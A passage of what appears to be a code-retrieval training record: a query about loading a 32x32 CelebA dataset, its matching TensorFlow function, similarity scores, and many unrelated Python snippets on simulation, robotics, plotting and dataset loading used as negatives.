1.10, 0.21 ),\n \"Ni\":( 0.96, 1.22, 0.195 ),\n \"Cu\":( 0.88, 1.16, 0.185 ),\n \"Zn\":( 0.82, 1.06, 0.175 ),\n \"Ga\":( 0.76, 0.935, 0.17 ),\n \"Ge\":( 0.72, 0.84, 0.16 ),\n \"As\":( 0.67, 0.745, 0.155 ),\n \"Se\":( 0.615, 0.67, 0.15 ),\n \"Br\":( 0.58, 0.62, 0.143 ),\n \"Kr\":( 0.56, 0.60, 0.138 ), \n\n \"Rb\":( 1.67, 2.43, 0.71 ),\n \"Sr\":( 1.42, 1.79, 0.633 ),\n \"Y\":( 1.32, 1.62, 0.58 ),\n \"Zr\":( 1.265, 1.56, 0.54 ),\n \"Nb\":( 1.23, 1.53, 0.51 ),\n \"Mo\":( 1.22, 1.50, 0.49 ),\n \"Tc\":( 1.16, 1.49, 0.455 ),\n \"Ru\":( 1.145, 1.46, 0.45 ),\n \"Rh\":( 1.11, 1.41, 0.42 ),\n \"Pd\":( 1.08, 1.37, 0.40 ), \n \"Ag\":( 1.045, 1.33, 0.385 ),\n \"Cd\":( 0.985, 1.23, 0.37 ),\n \"In\":( 0.94, 1.11, 0.36 ),\n \"Sn\":( 0.88, 1.00, 0.345 ),\n \"Sb\":( 0.83, 0.935, 0.335 ),\n \"Te\":( 0.79, 0.88, 0.325 ),\n \"I\":( 0.755, 0.83, 0.315 ),\n \"Xe\":( 0.75, 0.81, 0.305 ),\n \n \"Cs\":( 1.71, 2.60 ),\n \"Ba\":( 1.515, 1.887, 0.94 ),\n \"La\":( 1.375, 1.705, 0.874 ),\n \"Hf\":( 1.30, 1.61, 0.63 ),\n \"Ta\":( 1.25, 1.54, 0.605 ),\n \"W\":( 1.22, 1.515, 0.59 ), \n \"Re\":( 1.19, 1.49, 0.565 ),\n \"Os\":( 1.17, 1.48, 0.543 ),\n \"Ir\":( 1.16, 1.468, 0.526 ),\n \"Pt\":( 1.24, 1.46, 0.51 ),\n \"Au\":( 1.21, 1.45, 0.488 ),\n \"Hg\":( 1.07, 1.34, 0.475 ),\n \"Tl\":( 1.015, 1.22, 0.463 ),\n \"Pb\":( 0.96, 1.13, 0.45 ),\n \"Bi\":( 0.92, 1.077, 0.438 ),\n \"Po\":( 0.88, 1.02, 0.425 ),\n \"At\":( 0.85, 0.98, 0.475 ),\n \"Rn\":( 0.84, 0.94, 0.405 ) }", "def init_atom_coords(self) -> None:\n ...", "def setUp(self):\n self.f1 = uniutil.polynomial(enumerate([3, 6, 81, 1]), Z)\n self.f2 = uniutil.polynomial(enumerate([1, 81, 6, 3]), Z)\n self.f3 = uniutil.polynomial(enumerate([37, 6, 18, 1]), Z)\n self.f4 = uniutil.polynomial(enumerate([91, 7, 14, 1]), Z)\n # f5 = (x - 6)(x - 5)...x(x + 1)(x + 2) - 1\n self.f5 = uniutil.polynomial(enumerate([1439, -1368, -1324,\n 1638, -231, -252,\n 114, -18, 1]), Z)", "def init():", "def __init__(self, project=None):\n HyppopySolver.__init__(self, project)", "def set_equations(self, *args, **kwargs):\n pass", "def test_constructor(self, circuit):\n assert list(circuit.wires) == [jet.Wire(i, 0, False) for i in range(4)]\n assert list(circuit.operations) == [jet.Operation(jet.Qubit(), [i]) for i in range(4)]", "def setup(self):\n self.poly2 = Polygon([(145, 60), (201, 69), (265, 46), (333, 61), (352, 99), (370, 129), (474, 138), (474, 178), (396, 225), (351, 275), (376, 312), (382, 356), (338, 368), (287, 302), (224, 304), (128, 338), (110, 316), (129, 270), (83, 231), (65, 51), (83, 163), (103, 201), (90, 74), (126, 162)])\n self.poly2.set_direction(\"E\")\n self.poly1 = Polygon([(905, 328),(877, 367),(944, 413),(1004, 384),(1019, 307),(953, 248),(880, 250),(865, 278),(883, 325)])\n self.poly1.set_direction(\"SW\")\n self.poly3 = Polygon([(900, 600), (950,650), (1000, 500)])\n self.poly3.set_direction(\"N\")\n self.p1 = Point(485, 138)\n self.p1.set_direction(\"SE\")\n self.p2 = Point(self.width/2, self.height/2)\n self.p2.set_direction(\"NW\")\n self.p3 = Point(86,163)\n self.p3.set_direction(\"SE\")\n #a separate list for each different type of shape for collision purposes.\n self.polys = [self.poly1, self.poly2, self.poly3]\n self.points = [self.p1, self.p2, self.p3]", "def __init__(self, elements):\n \n self.elements = elements\n self.has_experiment = False\n \n self._set_weight_percent_positions()\n self._set_boron_ppm_positions()\n self._make_core_universe()", "def setup_camera(self) -> None:\n self.world.camera.update(\n cam_base_pos=(0, -3, 0),\n cam_dist=1.2*self.world.env_dim,\n cam_yaw=0,\n cam_pitch=-60\n )", "def __init__(self):\n self._tyrannosaurus = []\n self._triceratops = []", "def _setOceanLocation(self):\r\n\t\t## If the fluids_hrc exists\r\n\t\tif cmds.objExists('fluids_hrc'):\r\n\t\t\tif cmds.objExists('ocean_srf'):\r\n\t\t\t\tcmds.connectAttr('fluids_hrc.translateX', 'ocean_srf.translateX', f = True)\r\n\t\t\t\tcmds.connectAttr('fluids_hrc.translateZ', 'ocean_srf.translateZ', f = True)\r\n\t\t\telse:\r\n\t\t\t\tcmds.warning('MISSING ocean_srf node from scene....')\r\n\r\n\t\t\tif cmds.objExists('oceanPreviewPlane_prv'):\r\n\t\t\t\tcmds.connectAttr('fluids_hrc.translateX', 'oceanPreviewPlane_prv.translateX', f = True)\r\n\t\t\t\tcmds.connectAttr('fluids_hrc.translateZ', 'oceanPreviewPlane_prv.translateZ', f = True)\r\n\t\t\telse:\r\n\t\t\t\tcmds.warning('MISSING oceanPreviewPlane_prv node from scene....')\r\n\t\telse:\r\n\t\t\tcmds.warning('NO fluids_hrc FOUND! Can not move the ocean into final position. PLEASE CHECK FX PUBLISH NOW!')", "def init_fig():\r\n # Set the axis and plot titles\r\n orbit, = ax.plot([], [], [])\r\n satellite, = ax.plot([], [], [], 'o', color='red')\r\n earth, = ax.plot([], [], [], 'o', color='green')\r\n time_text.set_text('')\r\n ax.set_title(Title_3D, fontsize=22)\r\n ax.set_xlim3d([-lim, lim])\r\n ax.set_xlabel('I\\n[km]')\r\n ax.set_ylim3d([-lim, lim])\r\n ax.set_ylabel('J\\n[km]')\r\n ax.set_zlim3d([-lim, lim])\r\n ax.set_zlabel('K\\n[km]')\r\n # plot Earth\r\n\r\n u = np.linspace(0, 2 * np.pi, 100)\r\n v = np.linspace(0, np.pi, 100)\r\n x = R_moon * np.outer(np.cos(u), np.sin(v))\r\n y = R_moon * np.outer(np.sin(u), np.sin(v))\r\n z = R_moon * np.outer(np.ones(np.size(u)), np.cos(v))\r\n ax.plot_wireframe(x, y, z, color=\"grey\", label=\"Moon\", linewidth=0.3, rstride=7, cstride=7)\r\n # Must return the list of artists, but we use a pass\r\n # through so that they aren't created multiple times\r\n return orbit, satellite, earth, time_text", "def _reset(self):\n # Make planets accessible as properties\n for body in self.bodies:\n setattr(self, body.name, body)\n self._names = np.array([p.name for p in self.bodies])\n\n # Initialize the C interface\n self._Compute = liborbit.Compute\n self._Compute.argtypes = [ctypes.c_int,\n ctypes.POINTER(ctypes.POINTER(Body)),\n ctypes.c_double,\n ctypes.c_double,\n ctypes.c_double,\n ctypes.c_double,\n ctypes.c_double,\n ctypes.c_int]\n\n # Allocate memory for all the arrays\n for body in self.bodies:\n body.nt = 0\n body._transit_times = np.zeros(MAXTRANSITS)\n body._ptr_transit_times = \\\n np.ctypeslib.as_ctypes(body._transit_times)\n\n # A pointer to a pointer to `BODY`. This is an array of `n`\n # `BODY` instances, passed by reference. The contents can all be\n # accessed through `bodies`\n # NOTE: Before I subclassed BODY, this used to be\n # >>> self._ptr_bodies = (ctypes.POINTER(BODY) * \\\n # >>> len(self.bodies))(*[ctypes.pointer(p) for p in self.bodies])\n # I now cast the `Planet`, `Star`, and `Moon` instances as `BODY`\n # pointers, as per https://stackoverflow.com/a/37827528\n self._ptr_bodies = (ctypes.POINTER(Body) * len(self.bodies))(\n *[ctypes.cast(ctypes.byref(p),\n ctypes.POINTER(Body)) for p in self.bodies])", "def initialize_pins(self):\n\n for pin_name in self.pin_defs.keys():\n if self.pin_defs[pin_name]['mode'] == 'input':\n self.pin(pin_name).direction = digitalio.Direction.INPUT\n #logging.info('Pin {} set to {}'.format(pin_num, self.pin_defs[pin_num]['mode']))\n\n elif self.pin_defs[pin_name]['mode'] == 'output':\n self.pin(pin_name).switch_to_output(value=self.pin_defs[pin_name]['init'])\n #logging.info('Pin {} set to {}'.format(pin_num, self.pin_defs[pin_num]['mode']))\n\n else:\n logging.error('Error, no direction defined for pin {}, pin_defs: {}'\n .format(pin_name, self.pin_defs[pin_name]))", "def initialize_robot():\n\n proxy_motion = naoqi.ALProxy(\"ALMotion\", IP_ROBOT, PORT_ROBOT)\n proxy_motion.wakeUp()\n\n proxy_autonomous_life = naoqi.ALProxy(\"ALAutonomousLife\", IP_ROBOT, PORT_ROBOT)\n proxy_autonomous_life.setState(\"disabled\")\n\n proxy_motion = naoqi.ALProxy(\"ALMotion\", IP_ROBOT, PORT_ROBOT)\n proxy_motion.wakeUp()", "def set_earth(inclination, phases):\n cosi, sini = np.cos(inclination), np.sin(inclination)\n cosp = np.cos(2*np.pi*phases)\n sinp = np.sin(2*np.pi*phases)\n return CartesianRepresentation(sini*cosp, -sini*sinp, cosi)", "def setAllZero(self):\n self.robot.set_joint([0,0,0,0,0])\n self.robot.save_config()", "def setUp(self):\n # Set Model Parameters\n odeparam = np.array([0, 1, 1, 2])\n y0, y0_unc = np.ones(2), 0 * np.ones(2)\n t0, tmax = 0.0, 1.25\n\n # Set Method Parameters\n q = 1\n h = 0.1\n\n # Set up and solve ODE\n ibm = statespace.IBM(q=q, dim=len(y0))\n solver = linsolve.LinearisedODESolver(ibm)\n ivp = linode.LotkaVolterra(t0, tmax, odeparam, y0, y0_unc)\n tsteps, means, __, rhs_parts, uncerts = solver.solve(ivp, stepsize=h)\n self.mean = odesolver.get_trajectory_multidim(means, [0, 1], 0)\n\n # Set up BM and IBM covariance matrices\n evalpt = np.array(tsteps[[-1]])\n derdat = (tsteps, rhs_parts, 0.)\n\n const, jacob = linearisation.compute_linearisation(\n ssm=ibm, initial_value=y0,\n derivative_data=derdat, prdct_tsteps=evalpt)\n\n # Compute GP Estimation of filter mean at t=tmax\n postmean = const + np.dot(jacob, odeparam)\n self.postmean = postmean.reshape((2,))", "def setUp(self):\n # Set Model Parameters\n odeparam = np.array([0, 1, 1, 2])\n y0, y0_unc = np.ones(2), 0 * np.ones(2)\n t0, tmax = 0.0, 1.25\n\n # Set Method Parameters\n q = 1\n h = 0.1\n\n # Set up and solve ODE\n ibm = statespace.IBM(q=q, dim=len(y0))\n solver = linsolve.LinearisedODESolver(ibm)\n ivp = linode.LotkaVolterra(t0, tmax, odeparam, y0, y0_unc)\n tsteps, means, __, rhs_parts, uncerts = solver.solve(ivp, stepsize=h)\n self.mean = odesolver.get_trajectory_multidim(means, [0, 1], 0)\n\n # Set up BM and IBM covariance matrices\n evalpt = np.array(tsteps[[-1, -10]])\n derdat = (tsteps, rhs_parts, 0.)\n\n const, jacob = linearisation.compute_linearisation(\n ssm=ibm, initial_value=y0,\n derivative_data=derdat, prdct_tsteps=evalpt)\n\n # Compute GP Estimation of filter mean at t=tmax\n postmean = const + np.dot(jacob, odeparam)\n self.postmean = postmean.reshape((2, 2))", "def __init__(self):\n\n self.Cp_air0 = config_earth.earth_properties['Cp_air0']\n self.Rsp_air = config_earth.earth_properties['Rsp_air']\n\n self.d = config_earth.balloon_properties['d']\n self.vol = math.pi*4/3*pow((self.d/2),3) #volume m^3\n self.surfArea = math.pi*self.d*self.d #m^2\n self.cs_area = math.pi*self.d*self.d/4.0 #m^2\n\n #self.emissEnv = config_earth.balloon_properties['emissEnv']\n self.areaDensityEnv = config_earth.balloon_properties['areaDensityEnv']\n self.mp = config_earth.balloon_properties['mp']\n self.mdot = 0\n self.massEnv = config_earth.balloon_properties['mEnv']\n self.Upsilon = config_earth.balloon_properties['Upsilon']\n\n self.vent = config_earth.simulation['vent']\n self.coord = config_earth.simulation['start_coord']\n self.t = config_earth.simulation['start_time']\n self.lat = math.radians(self.coord['lat'])\n self.Ls = self.t.timetuple().tm_yday\n self.min_alt = config_earth.simulation['min_alt']\n\n self.vm_coeff = .1 #virtual mass coefficient\n self.k = self.massEnv*config_earth.balloon_properties['cp'] #thermal mass coefficient\n\n self.dt = config_earth.dt", "def __init__(self):\n GPIO.setmode(GPIO.BOARD)\n for light in self.all:\n GPIO.setup(light, GPIO.OUT)", "def __init__(self, features_number, surfaces_dimensions, taus, first_layer_polarities,\n delay_coeff, net_seed = 0, verbose=False):\n self.basis = []\n self.activations = []\n self.taus = taus\n self.layers = len(features_number)\n self.surfaces_dimensions = surfaces_dimensions\n self.features_number = features_number\n self.delay_coeff = delay_coeff\n self.verbose = verbose\n self.polarities = []\n self.polarities.append(first_layer_polarities)\n # attribute containing all surfaces computed in each layer and sublayer\n self.surfaces = []\n # attribute containing all optimization errors computed in each layer \n # and sublayer\n self.errors = []\n #setting the seed\n rng = np.random.RandomState()\n if (net_seed!=0):\n rng.seed(net_seed)\n # In the first layer I am going to process only 2 polarities corresponging\n # to on off events\n num_polarities = 1 \n for layer, nfeatures in enumerate(features_number):\n #basis and activations of a single sublayer\n sublayers_basis = []\n sublayers_activations = []\n self.polarities.append(nfeatures)\n for sublayer in range(2**layer):\n #basis and activations of a single layer\n basis_set = []\n activations_set = []\n for j in range(nfeatures):\n basis_set.append(rng.rand(surfaces_dimensions[layer][1], surfaces_dimensions[layer][0]*num_polarities))\n basis_set[j][surfaces_dimensions[layer][1]//2, [surfaces_dimensions[layer][0]//2 + surfaces_dimensions[layer][0]*a for a in range(num_polarities)]] = 1\n #activations, or aj (as in the paper) are set randomly between -1 and 1\n activations_set.append((rng.rand()-0.5)*2)\n sublayers_basis.append(np.array(basis_set))\n sublayers_activations.append(np.array(activations_set))\n self.basis.append(sublayers_basis)\n self.activations.append(sublayers_activations)\n num_polarities = nfeatures", "def setup(env, NUM_TRACKS, landtime, t_inter):\n # Create the airport\n airport = Airport(env, NUM_TRACKS, landtime)\n\n # Create 4 initial planes\n for i in range(1):\n env.process(plane(env, 'Aviao %d' % i, airport))\n\n # Create more planes while the simulation is running\n while True:\n yield env.timeout(random.randint(t_inter-2, t_inter+2))\n# yield env.timeout(random.expovariate(1.0 / t_inter))\n i += 1\n env.process(plane(env, 'Aviao %d' % i, airport))", "def teleopInit(self):\n self.Drive.resetEncoder()\n\n self.Drive.disableAutoForward()\n self.Drive.disableAutoTurn()\n self.Drive.disableVision()\n\n self.DS.setWhichVariable(True)\n self.Drive.updateSetpoint(\"teleop\")\n self.DS.setFirstTimeVariable(True)\n self.timer.reset()\n\n self.matchTime.startMode(isAuto=False)", "def setup_camera(self) -> None:\n self.world.camera.update(\n cam_base_pos=(3., 0, 2),\n cam_dist=2.5,\n cam_yaw=90,\n cam_pitch=-50\n )", "def reset(self):\n p.resetSimulation()\n p.setPhysicsEngineParameter(numSolverIterations=150)\n p.setTimeStep(self._time_step)\n p.setGravity(0, 0, -9.8)\n\n # load plane\n p.loadURDF(os.path.join(pybullet_data.getDataPath(), \"plane.urdf\"), [0, 0, 0])\n # load robot\n self._darwin = DarwinopEnv()\n\n # Let the world run for a bit\n for _ in range(20):\n p.stepSimulation()", "def __init__(self, x_coor, x_speed, y_coor, y_speed, direction):\n self.__x_coor = x_coor\n self.__x_speed = x_speed\n self.__y_coor = y_coor\n self.__y_speed = y_speed\n self.__direction = direction\n self.__radius = self.TORPEDO_RADIUS" ]
[ "0.59741217", "0.59616315", "0.59439087", "0.59116036", "0.58822644", "0.58440155", "0.5834586", "0.57733816", "0.5746145", "0.5736931", "0.57054114", "0.56986", "0.56339926", "0.5609833", "0.5579601", "0.5572102", "0.5556903", "0.55461323", "0.5529173", "0.5519832", "0.5515164", "0.5472385", "0.5467574", "0.5460015", "0.5438609", "0.54115", "0.5408959", "0.5399853", "0.53980935", "0.53942484", "0.5394079", "0.5393548", "0.5377922", "0.53761595", "0.5358563", "0.535133", "0.53391325", "0.53368145", "0.5336245", "0.5307493", "0.53017604", "0.52934134", "0.5284276", "0.52769476", "0.5269893", "0.52651155", "0.5261323", "0.52530164", "0.5250208", "0.5246166", "0.5244711", "0.5243743", "0.52421975", "0.5241909", "0.52403665", "0.5238439", "0.5237766", "0.52374095", "0.5236236", "0.5221624", "0.522048", "0.5217602", "0.5214162", "0.5211386", "0.5202315", "0.51984346", "0.5198142", "0.51854175", "0.518541", "0.51825017", "0.5178367", "0.51779556", "0.5168202", "0.51629955", "0.5160836", "0.51587945", "0.5157338", "0.51549584", "0.51547307", "0.5148965", "0.51434916", "0.5140861", "0.5138149", "0.51307267", "0.5129831", "0.5126325", "0.5124809", "0.5121294", "0.5119004", "0.511799", "0.5116539", "0.5113374", "0.5111088", "0.5108887", "0.5108782", "0.5108378", "0.5108325", "0.50906205", "0.5087886", "0.50875497" ]
0.64385605
0
Loads the preprocessed celeb_a dataset scaled down to 32x32
def get_celeb_a32(): path = './data/celeb_a32' if not os.path.exists(path): print(path, " does not exits") return None images = utils.get_tensor_images_from_path(path) data = tf.data.Dataset.from_tensor_slices(images) data = data.map(lambda x: tf.cast(x, tf.float32)) data = data.batch(int(tf.data.experimental.cardinality(data))) return data
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def load_celebA():\n channel_mean = [0.50003925, 0.42008925, 0.37377534]\n channel_std = [0.30878809, 0.28794379, 0.28661432]\n\n dataset = CelebA(transform=transforms.Compose([\n transforms.CenterCrop(178),\n transforms.Resize(64),\n transforms.ToTensor(),\n transforms.Normalize(channel_mean, channel_std)\n ]))\n\n setattr(dataset, \"mean\", channel_mean)\n setattr(dataset, \"std\", channel_std)\n\n loader_params = {\n \"num_workers\": 2,\n \"shuffle\": True,\n \"batch_size\": 128\n } \n\n train = DataLoader(dataset, **loader_params)\n\n return train", "def load_cifa_10():\n train_set_x = np.ndarray([ 50000, 3072 ])\n train_set_y = np.ndarray( [50000] )\n\n batch_size = 10000\n for i in xrange(5):\n batch = open( datapath + \"data_batch_\"+str(i+1), 'rb')\n map = cPickle.load( batch )\n batch.close()\n train_set_x[ i*batch_size : (i+1)*batch_size , : ] = np.asarray( map[ 'data' ], dtype = 'float32' )\n train_set_y[ i*batch_size : (i+1)*batch_size ] = np.asarray( map[ 'labels' ], dtype = 'float32' )\n\n test_file = open( datapath + 'test_batch', 'rb')\n map = cPickle.load( test_file )\n test_file.close()\n \n test_set_x = np.asarray( map['data'], dtype = 'float32' )\n test_set_y = np.asarray( map['labels'], dtype = 'float32' )\n \n\n return train_set_x, train_set_y, test_set_x, test_set_y", "def load_kiba_dataset():\n trainn_fold = json.load(\n open(os.path.join('dataset', 'regression', 'benchmark', 'KIBAtest', 'folds', 'train_fold_setting1.txt')))\n train_fold = []\n for e in zip(*trainn_fold):\n for ee in e:\n train_fold.extend(ee)\n #train_fold = [ee for e in trainn_fold for ee in e]\n test_fold = json.load(\n open(os.path.join('dataset', 'regression', 'benchmark', 'KIBAtest', 'folds', 'test_fold_setting1.txt')))\n ligands = json.load(\n open(os.path.join('dataset', 'regression', 'benchmark', 'KIBAtest', 'ligands_can.txt')),\n object_pairs_hook=OrderedDict)\n proteins = json.load(\n open(os.path.join('dataset', 'regression', 'benchmark', 'KIBAtest', 'proteins.txt')),\n object_pairs_hook=OrderedDict)\n \n affinity = pickle.load(open(os.path.join('dataset', 'regression', 'benchmark', 'KIBAtest', 'Y'), \n 'rb'), encoding='latin1')\n smiles_lst, protein_lst = [], []\n\n for k in ligands.keys():\n smiles = ligands[k]\n smiles_lst.append(smiles)\n for k in proteins.keys():\n protein_lst.append(proteins[k])\n\n affinity = np.asarray(affinity)\n \n os.makedirs(os.path.join('dataset', 'regression', 'benchmark', 'KIBAtest', 'processed'), exist_ok=True)\n train_test_dataset = []\n for split in ['train', 'test']:\n split_dir = os.path.join('dataset', 'regression', 'benchmark', 'KIBAtest', 'processed', split)\n os.makedirs(split_dir, exist_ok=True)\n fold = train_fold if split == 'train' else test_fold\n rows, cols = np.where(np.isnan(affinity) == False)\n rows, cols = rows[fold], cols[fold]\n \n data_lst = [[] for _ in range(1)]\n for idx in range(len(rows)):\n data = {}\n data['smiles'] = smiles_lst[rows[idx]]\n data['protein'] = protein_lst[cols[idx]]\n af = affinity[rows[idx], cols[idx]]\n data['aff'] = af\n\n data_lst[idx % 1].append(data)\n random.shuffle(data_lst)\n train_test_dataset.append(data_lst[0])\n return train_test_dataset", "def load_CIFAR_batch(filename):\r\n with open(filename, 'rb') as f:\r\n datadict = pickle.load(f, encoding='latin1')\r\n X = datadict['data']\r\n Y = datadict['labels']\r\n X = X.reshape(10000, 3, 32, 32).transpose(0,2,3,1).astype(\"float\")\r\n Y = np.array(Y)\r\n return X, Y", "def load_data(path=\"../data/cora/\", dataset=\"cora\"):\n print('Loading {} dataset...'.format(dataset))\n\n idx_features_labels = np.genfromtxt(\"{}{}.content\".format(path, dataset),\n dtype=np.dtype(str))\n features = sp.sparse.csr_matrix(idx_features_labels[:, 1:-1], dtype=np.float32)\n# labels = encode_onehot(idx_features_labels[:, -1])\n values = np.unique(idx_features_labels[:, -1])\n values.sort()\n labels = np.zeros(idx_features_labels.shape[0])\n for i in range(labels.shape[0]):\n labels[i] = np.where(values == idx_features_labels[i, -1])[0][0]\n labels = torch.tensor(labels).long()\n\n # build graph\n idx = np.array(idx_features_labels[:, 0], dtype=np.int32)\n idx_map = {j: i for i, j in enumerate(idx)}\n edges_unordered = np.genfromtxt(\"{}{}.cites\".format(path, dataset),\n dtype=np.int32)\n edges = np.array(list(map(idx_map.get, edges_unordered.flatten())),\n dtype=np.int32).reshape(edges_unordered.shape)\n adj = sp.sparse.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])),\n shape=(labels.shape[0], labels.shape[0]),\n dtype=np.float32)\n\n # build symmetric adjacency matrix\n adj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)\n\n# features = normalize(features)\n adj = normalize(adj + sp.sparse.eye(adj.shape[0]))\n\n idx_train = range(140)\n idx_val = range(200, 500)\n idx_test = range(500, 1500)\n\n features = torch.FloatTensor(np.array(features.todense()))\n# labels = torch.LongTensor(np.where(labels)[1])\n adj = sparse_mx_to_torch_sparse_tensor(adj)\n\n idx_train = torch.LongTensor(idx_train)\n idx_val = torch.LongTensor(idx_val)\n idx_test = torch.LongTensor(idx_test)\n\n return adj, features, labels, idx_train, idx_val, idx_test", "def load_CIFAR_batch(filename):\n with open(filename, 'rb')as f:\n datadict = p.load(f, encoding='iso-8859-1')\n X = datadict['data']\n Y = datadict['labels']\n X = X.reshape(10000, 3, 32, 32)\n Y = np.array(Y)\n return X, Y", "def load_CIFAR_batch(filename):\n with open(filename, 'rb') as f:\n datadict = pickle.load(f, encoding='latin1')\n X = datadict['data']\n Y = datadict['labels']\n X = X.reshape(10000, 3, 32, 32).transpose(0, 2, 3, 1).astype(\"float64\")\n Y = np.array(Y)\n return X, Y", "def load_batch(batch_name):\n data_dict = unpickle('./datasets/cifar-10-batches-py/' + batch_name)\n X = data_dict[b'data'] / 255\n X = X.reshape(10000, 3, 32, 32).transpose(0,2,3,1).reshape(10000, 3072).transpose(1,0)\n y = data_dict[b'labels']\n Y = make_one_hot(y)\n return X, Y, y", "def load_CIFAR_batch(filename):\n with open(filename, 'rb')as f:\n # datadict = p.load(f)\n datadict = pickle.load(f, encoding = 'bytes')\n X = datadict[b'data']\n Y = datadict[b'labels']\n X = X.reshape(10000, 3, 32, 32)\n Y = np.array(Y)\n return X, Y", "def __loadPreProcessedData(self):\n le = joblib.load(self.le_filename)\n X = np.loadtxt(self.X_filename, delimiter=',').astype(int)\n raw_y = np.loadtxt(self.y_filename, delimiter=',').astype(int)\n y = le.inverse_transform(raw_y)\n ##Initialize atrtribute for this class\n self.le, self.X, self.y = le, X, y", "def load_data():\n (trainx, trainy), (valx, valy), (testx, testy) = pickle.load(gzip.open(\"data/mnist_one_hot.pkl.gz\"),\n encoding=\"latin1\")\n trainy = np.argmax(trainy, axis=1)\n valy = np.argmax(valy, axis=1)\n testy = np.argmax(testy, axis=1)\n trainx = trainx * 2 - 1\n valx = valx * 2 - 1\n testx = testx * 2 - 1\n return (trainx.reshape(-1, 1, 28, 28), trainy), (valx.reshape(-1, 1, 28, 28), valy), (testx.reshape(-1, 1, 28, 28),\n testy)", "def load_data_pkl(self):\n pkl_name = '{}/data/mini-imagenet-cache-{}.pkl'.format(self.root_dir, self.split)\n print('Loading pkl dataset: {} '.format(pkl_name))\n\n try:\n with open(pkl_name, \"rb\") as f:\n data = pkl.load(f, encoding='bytes')\n image_data = data[b'image_data']\n class_dict = data[b'class_dict']\n except:\n with open(pkl_name, \"rb\") as f:\n data = pkl.load(f)\n image_data = data['image_data']\n class_dict = data['class_dict']\n\n print(data.keys(), image_data.shape, class_dict.keys())\n data_classes = sorted(class_dict.keys()) # sorted to keep the order\n\n n_classes = len(data_classes)\n print('n_classes:{}, n_label:{}, n_unlabel:{}'.format(n_classes,self.n_label,self.n_unlabel))\n dataset_l = np.zeros([n_classes, self.n_label, self.im_height, self.im_width, self.channels], dtype=np.float32)\n if self.n_unlabel>0:\n dataset_u = np.zeros([n_classes, self.n_unlabel, self.im_height, self.im_width, self.channels], dtype=np.float32)\n else:\n dataset_u = []\n\n for i, cls in enumerate(data_classes):\n idxs = class_dict[cls] \n np.random.RandomState(self.seed).shuffle(idxs) # fix the seed to keep label,unlabel fixed\n dataset_l[i] = image_data[idxs[0:self.n_label]]\n if self.n_unlabel>0:\n dataset_u[i] = image_data[idxs[self.n_label:]]\n print('labeled data:', np.shape(dataset_l))\n print('unlabeled data:', np.shape(dataset_u))\n \n self.dataset_l = dataset_l\n self.dataset_u = dataset_u\n self.n_classes = n_classes\n\n del image_data", "def prepare_data(src, dst):\n\n data_prefix = 'miniCelebA_'\n for split in ['train', 'val', 'test']:\n print('processing %s split' % split)\n if (not os.path.exists(os.path.join(dst, 'x_' + split + '.npy')) or not\n os.path.exists(os.path.join(dst, 'y_' + split + '.npy'))):\n labels = glob(os.path.join(src, split, '*'))\n no_sample = 0\n for lb in labels:\n no_sample += len(os.listdir(lb))\n\n x = np.zeros((no_sample, 224, 224, 3))\n y = np.zeros((no_sample, 20))\n count = 0\n for lb in labels:\n files = glob(os.path.join(lb, '*.png'))\n for f in files:\n print('processing file: %s, with label %s' % (f, lb.split('/')[-1]))\n y[count] = to_categorical(int(lb.split('/')[-1]), 20)\n img = misc.imresize(misc.imread(f), (224, 224), 'bicubic')\n if img.ndim == 2:\n img = np.expand_dims(img, -1)\n img = np.concatenate((img, img, img), axis=-1)\n x[count] = img\n\n count += 1\n\n assert count == no_sample, \"number of sample (%d) is different than number of read image (%d)\" % (\n no_sample, count)\n\n x = get_deep_feature(x)\n np.save(os.path.join(dst, data_prefix + 'x_' + split + '.npy'), x)\n np.save(os.path.join(dst, data_prefix + 'y_' + split + '.npy'), y)", "def load_batch(filename: str) -> Tuple[ndarray, ndarray, ndarray]:\n dataDict = unpickle(filename)\n print(\"1\", dataDict[b\"data\"][1, :])\n X = (dataDict[b\"data\"] / 255).T\n print(\"2\", X[:, 1])\n y = np.array(dataDict[b\"labels\"])\n Y = np.eye(10)[y].T\n return X, Y, y", "def load_data(path=\"./data/cora/\", dataset=\"cora\"):\n print('Loading {} dataset...'.format(dataset))\n\n idx_features_labels = np.genfromtxt(\"{}{}.content\".format(path, dataset), dtype=np.dtype(str))\n features = sp.csr_matrix(idx_features_labels[:, 1:-1], dtype=np.float32)\n labels = encode_onehot(idx_features_labels[:, -1])\n\n # build graph\n idx = np.array(idx_features_labels[:, 0], dtype=np.int32)\n idx_map = {j: i for i, j in enumerate(idx)}\n edges_unordered = np.genfromtxt(\"{}{}.cites\".format(path, dataset), dtype=np.int32)\n edges = np.array(list(map(idx_map.get, edges_unordered.flatten())), dtype=np.int32).reshape(edges_unordered.shape)\n adj = sp.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])), shape=(labels.shape[0], labels.shape[0]), dtype=np.float32)\n\n # build symmetric adjacency matrix\n adj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)\n\n features = normalize_features(features)\n adj = normalize_adj(adj + sp.eye(adj.shape[0]))\n\n idx_train = range(140)\n idx_val = range(200, 500)\n idx_test = range(500, 1500)\n\n adj = torch.FloatTensor(np.array(adj.todense()))\n features = torch.FloatTensor(np.array(features.todense()))\n labels = torch.LongTensor(np.where(labels)[1])\n\n idx_train = torch.LongTensor(idx_train)\n idx_val = torch.LongTensor(idx_val)\n idx_test = torch.LongTensor(idx_test)\n\n return adj, features, labels, idx_train, idx_val, idx_test", "def load_data(self):\n print('Loading {} dataset'.format(self.split))\n data_split_path = os.path.join(self.root_dir, 'splits', '{}.csv'.format(self.split))\n with open(data_split_path,'r') as f:\n reader = csv.reader(f, delimiter=',')\n data_classes = {}\n for i,row in enumerate(reader):\n if i==0:\n continue\n data_classes[row[1]] = 1\n data_classes = data_classes.keys()\n print(data_classes)\n\n n_classes = len(data_classes)\n print('n_classes:{}, n_label:{}, n_unlabel:{}'.format(n_classes,self.n_label,self.n_unlabel))\n dataset_l = np.zeros([n_classes, self.n_label, self.im_height, self.im_width, self.channels], dtype=np.float32)\n if self.n_unlabel>0:\n dataset_u = np.zeros([n_classes, self.n_unlabel, self.im_height, self.im_width, self.channels], dtype=np.float32)\n else:\n dataset_u = []\n\n for i, cls in enumerate(data_classes):\n im_dir = os.path.join(self.root_dir, 'data/{}/'.format(self.split), cls)\n im_files = sorted(glob.glob(os.path.join(im_dir, '*.jpg')))\n 